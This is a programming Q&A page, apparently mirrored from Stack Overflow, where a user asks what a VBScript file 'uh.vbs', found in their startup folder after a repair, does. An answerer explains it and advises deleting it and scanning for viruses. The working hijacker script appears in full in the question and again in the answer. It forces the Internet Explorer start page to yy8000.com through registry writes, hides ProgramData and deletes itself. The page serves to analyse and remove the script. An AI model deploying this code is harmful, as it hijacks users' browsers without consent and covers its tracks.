当前位置: 动力学知识库 > 问答 > 编程问答 >

vbscript - What does this Visual Basic Sript called uh.vbs do?

问题描述:

not long ago sent my computer away for some off-warranty work (the BIOS was not recognizing one of my HDD bays) and when it came back with a new HDD board, I was getting an odd error while rebooting.

Eventually I figured out that there was a new file, called "uh.vbs", in the Windows startup folder, and there was an error when it was run upon boot. Not knowing anything about vbs I have no idea what this file does, beyond that it was either created or modified while my computer was in the repair shop. I notice that it points to a couple webpages, and has some Chinese characters, so I'm hoping that one of the well-versed people on this site can fill me in. Below is the code...

Edit: I had to take a bunch of it out because of a strange error apparently caused by Chinese characters, which is not identified by the site and which took me half an hour to eventually figure out. I deleted the Chinese-looking characters and put MISSING_CHINESE_CHARTERS everywhere I took them out.

On Error Resume Next

set lhwy=createobject("wscript.shell")

path="HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\main\Start Page"

tf=lhwy.regwrite(path,"http://home.yy8000.com/")

set path=nothing

path="HKEY_CURRENT_USER\SOFTWARE\MICROSOFT\Internet Explorer\Main\Start Page"

tf=lhwy.regwrite(path,"http://home.yy8000.com/")

WScript.Sleep(30000)

set lhwy=createobject("wscript.shell")

path="HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\main\Start Page"

tf=lhwy.regwrite(path,"http://home.yy8000.com/")

set path=nothing

path="HKEY_CURRENT_USER\SOFTWARE\MICROSOFT\Internet Explorer\Main\Start Page"

tf=lhwy.regwrite(path,"http://home.yy8000.com/")

Dim objws,objfso,dn

Set objws=WScript.CreateObject("wscript.shell")

Set objfso=CreateObject("scripting.filesystemobject")

dn=objfso.GetDriveName(WScript.ScriptFullName)

objws.run "attrib +h " & dn & "\ProgramData",0

Set fso = CreateObject("Scripting.FileSystemObject")

WScript.Sleep 3000 'MISSING_CHINESE_CHARACTERS

fso.DeleteFile(WScript.ScriptName) 'MISSING_CHINESE_CHARACTERS

If fso.FileExists("\Documents and Settings\All Users\MISSING_CHINESE_CHARACTERS\uh.VBS") Then

fso.DeleteFile("\Documents and Settings\All Users\MISSING_CHINESE_CHARACTERS\uh.VBS") 'MISSING_CHINESE_CHARACTERS

end if

Set fso = CreateObject("Scripting.FileSystemObject")

WScript.Sleep 1000 'MISSING_CHINESE_CHARACTERS

fso.DeleteFile(WScript.ScriptName) 'MISSING_CHINESE_CHARACTERS

If fso.FileExists("\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\uh.VBS") Then

fso.DeleteFile("\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\uh.VBS") 'MISSING_CHINESE_CHARACTERS

end if

Wscript.quitPAPK

Thanks for any input.

网友答案:

It seems to be a relatively poor attempt at malware.

This bit is trying to set your IE start page to http://home.yy8000.com/ -

path="HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\main\Start Page"
tf=lhwy.regwrite(path,"http://home.yy8000.com/")
set path=nothing
path="HKEY_CURRENT_USER\SOFTWARE\MICROSOFT\Internet Explorer\Main\Start Page"
tf=lhwy.regwrite(path,"http://home.yy8000.com/")

Then the next bit waits 30 seconds before doing it again (the writer probably thought there was a chance the registry would be inaccessible when the script first runs).

This next bit is a little odd, it hides the ProgramData folder (which in most cases will be hidden anyway) -

Dim objws,objfso,dn
Set objws=WScript.CreateObject("wscript.shell")
Set objfso=CreateObject("scripting.filesystemobject")
dn=objfso.GetDriveName(WScript.ScriptFullName)
objws.run "attrib +h " & dn & "\ProgramData",0

The section with the unusual characters simply delete the script once it's done it's "damage".

Set fso = CreateObject("Scripting.FileSystemObject")
WScript.Sleep 3000 'MISSING_CHINESE_CHARACTERS
fso.DeleteFile(WScript.ScriptName) 'MISSING_CHINESE_CHARACTERS
If fso.FileExists("\Documents and Settings\All Users\MISSING_CHINESE_CHARACTERS\uh.VBS") Then
  fso.DeleteFile("\Documents and Settings\All Users\MISSING_CHINESE_CHARACTERS\uh.VBS") 'MISSING_CHINESE_CHARACTERS
end if


Set fso = CreateObject("Scripting.FileSystemObject")
WScript.Sleep 1000 'MISSING_CHINESE_CHARACTERS
fso.DeleteFile(WScript.ScriptName) 'MISSING_CHINESE_CHARACTERS
If fso.FileExists("\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\uh.VBS") Then
fso.DeleteFile("\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\uh.VBS") 'MISSING_CHINESE_CHARACTERS
end if

My suspicion would be that the people who did the repair plugged a USB stick into your computer that had previously been plugged into another repair. The file had been copied automatically onto the USB and then onto your computer when they plugged it in.

Delete the file and do a virus check. The malware attempt is so poor this simple script may be hiding a bigger issue. I've seen scripts like this in the past where there is another process running that creates the script file (possibly during shutdown).

Look at Kaspersky's live CD if you didn't have a virus checker installed before sending your PC in for warranty.

分享给朋友:
您可能感兴趣的文章:
随机阅读: